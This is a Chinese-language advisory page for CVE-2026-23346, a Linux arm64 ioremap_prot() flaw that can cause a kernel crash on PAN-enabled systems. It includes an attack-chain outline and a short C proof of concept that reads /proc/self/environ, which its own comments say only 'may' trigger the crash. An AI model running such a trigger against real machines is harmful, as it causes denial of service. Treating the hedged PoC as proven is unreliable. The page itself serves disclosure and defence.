CVE-2026-23346 CVSS 5.5 中危

CVE-2026-23346 Linux内核arm64内存映射权限错误漏洞

披露日期: 2026-03-25

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23346

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核arm64架构的`ioremap_prot()`函数存在漏洞。当`generic_access_phys()`调用该函数并传递包含权限位的`pgprot_t`值时，由于未正确提取用户内存类型，导致在启用PAN（特权访问永不）的系统中，内核访问该映射时发生权限错误，进而引发系统崩溃或拒绝服务。

技术细节

该漏洞源于Linux内核在arm64平台上处理IO重映射时的逻辑缺陷。`generic_access_phys()`函数尝试通过`ioremap_prot()`建立物理内存的映射，并直接传递了从用户页表获取的`pgprot_t`结构。在arm64架构中，该结构不仅包含内存类型，还包含权限控制位。由于`ioremap_prot()`未过滤这些用户态权限位，导致返回的映射保留了用户态属性。当带有PAN特性的内核尝试读取该区域时，硬件会阻止访问并触发异常，导致内核恐慌。攻击者可利用此漏洞通过本地特定的读取操作（如读取进程环境变量）触发崩溃。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限访问（AV:L, PR:L）。

STEP 2

步骤2

攻击者执行特定的系统调用或程序，例如读取进程环境变量（/proc/pid/environ），触发内核调用链。

STEP 3

步骤3

内核执行到generic_access_phys()函数，并调用ioremap_prot()进行内存映射。

STEP 4

步骤4

由于未正确过滤用户权限位，内核在启用PAN的系统上访问该映射时触发异常。

STEP 5

步骤5

系统发生内核恐慌或崩溃，导致拒绝服务（A:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

// PoC for CVE-2026-23346
// This PoC attempts to trigger the vulnerability by reading /proc/self/environ.
// The call trace indicates environ_read -> access_remote_vm -> generic_access_phys.
// On a vulnerable kernel with PAN enabled, this may cause a kernel crash (DoS).

int main() {
    int fd;
    char buffer[4096];
    ssize_t bytes_read;

    printf("Attempting to read /proc/self/environ to trigger potential kernel path...\n");

    fd = open("/proc/self/environ", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    bytes_read = read(fd, buffer, sizeof(buffer) - 1);
    if (bytes_read > 0) {
        buffer[bytes_read] = '\0';
        printf("Read %zd bytes. If kernel crashes, vulnerability is triggered.\n", bytes_read);
    } else {
        perror("read");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (Commit 3d64dcc0799c2d6921ba027716b7be721eb19fa8)

Linux Kernel (Commit 8f098037139b294050053123ab2bc0f819d08932)

Linux Kernel (Commit d1ad8fe7f72d73e1617bac79f2ec7a3bedf47e2a)

防御指南

临时缓解措施

限制非特权用户对系统内存相关接口的访问能力，或等待内核更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表